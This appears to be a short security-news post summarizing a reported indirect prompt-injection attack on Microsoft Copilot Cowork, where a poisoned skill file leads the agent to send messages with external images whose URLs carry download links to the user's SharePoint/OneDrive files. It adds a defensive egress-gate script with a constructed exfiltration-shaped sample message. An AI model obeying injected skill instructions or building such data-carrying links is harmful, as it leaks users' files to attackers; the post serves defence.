2026-05-26 · Radar
Copilot Cowork turns user permissions into a file exfiltration path via prompt injection
PromptArmor researchers described an attack on Microsoft Copilot Cowork that shows what happens when an agent gets access to data and communication channels without hard limits on sensitive actions.
An indirect prompt injection in a skill file opens a path to files
An attacker can place an indirect prompt injection inside a skill file. When a user asks Copilot Cowork for a routine task, such as a weekly work recap, the agent uses its Microsoft 365 permissions and can reach files in SharePoint or OneDrive. The key detail is in the communication layer: according to PromptArmor, Teams messages or emails sent to the active user required no confirmation step. If such a message contained an external image, opening it could trigger a request to an attacker-controlled server. The URL could carry pre-authenticated download links to files the user was allowed to access.
For enterprise teams, security stops being a question of model quality
Copilot Cowork operates with the user's permissions and accesses Microsoft Graph. That is exactly why it is useful. It is also why it becomes dangerous when the system lacks hard limits around actions that can cause data exfiltration.
For companies, the key point is that the problem is not only about model quality. Even a capable model can be manipulated if it has access to data, a channel for sending messages, and a way to create links that expose data outside the original context. Agent security moves from "does it answer correctly?" to "what can it do when it answers incorrectly?"
Approving sensitive actions and controlling egress channels are operational requirements
Enterprise agents have a legitimate place. The condition is that approval for sensitive actions, permission limits, and egress control are not optional extras. If an agent can read files, send messages, and embed external content, an attacker can build an exploit out of legitimate features.
The mitigations are not free either. PromptArmor mentions restricting SharePoint downloads, but those policies can break normal workflows. That is why agentic deployment has to be treated as a security project, not just a new feature toggle in an admin console.
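One concrete shape such an egress control can take, as an added example written for this page (not PromptArmor's or Microsoft's code): a gate that inspects a message the agent is about to send on the user's behalf, flags images served from hosts outside an assumed tenant allowlist and image URLs whose query string smuggles another link or a long token, and holds the message for approval instead of sending it. The allowlisted hosts and both sample messages are constructed for the example.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse, parse_qs

# Assumed allowlist of image hosts the tenant treats as internal (constructed for this example).
TRUSTED_IMAGE_HOSTS = {"contoso.sharepoint.com", "contoso-my.sharepoint.com"}

# Matches <img src="..."> in HTML and ![alt](url) in Markdown message bodies.
IMG_RE = re.compile(r"""<img[^>]+src=["']([^"']+)["']|!\[[^\]]*\]\(([^)\s]+)\)""", re.I)


@dataclass
class Decision:
    allowed: bool                      # False means: hold the message for human approval
    reasons: list = field(default_factory=list)


def extract_image_urls(body: str) -> list:
    return [html or md for html, md in IMG_RE.findall(body)]


def carries_embedded_link_or_token(url: str) -> bool:
    """True if any query parameter is itself a URL or a long opaque value, i.e. a
    likely download link or token being carried out through the image fetch."""
    for values in parse_qs(urlparse(url).query).values():
        for v in values:
            if v.lower().startswith(("http://", "https://")) or len(v) > 40:
                return True
    return False


def gate_outbound_message(body: str, trusted=TRUSTED_IMAGE_HOSTS) -> Decision:
    """Egress check for a message the agent wants to send with the user's permissions."""
    reasons = []
    for url in extract_image_urls(body):
        host = urlparse(url).hostname or ""
        if host not in trusted:
            reasons.append(f"image fetched from external host: {host}")
        if carries_embedded_link_or_token(url):
            reasons.append(f"image URL smuggles a link or token: {url}")
    return Decision(allowed=not reasons, reasons=reasons)


# Constructed sample messages: a benign recap and one shaped like the reported exfil path.
BENIGN = "Weekly recap attached. ![chart](https://contoso.sharepoint.com/sites/team/chart.png)"
SUSPECT = ('Recap: <img src="https://cdn.example.net/p.png?f=https%3A%2F%2Fcontoso-my.sharepoint.com'
           '%2Fpersonal%2Fu%2Fq.docx%3Fdownload%3D1">')

if __name__ == "__main__":
    for body in (BENIGN, SUSPECT):
        print(gate_outbound_message(body))
```

The benign recap passes; the second message is held with two reasons (external host, and a query parameter that decodes to a SharePoint download link).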
Microsoft must tighten message approval and auditable egress controls
Watch how Microsoft changes approval for messages sent to the active user, how it restricts the handling of external content, and what controls administrators get for skills stored in OneDrive. Another important signal will be whether similar attacks appear in other agents connected to email, documents and internal chat.
Lilith's verdict
An agent with Graph access is an employee holding a general power of attorney, able to open the door even when it thinks it is only sending a harmless recap message.
I keep the external link at the end. First, a concise explanation here — no hunting across someone else's site.
Original source ↗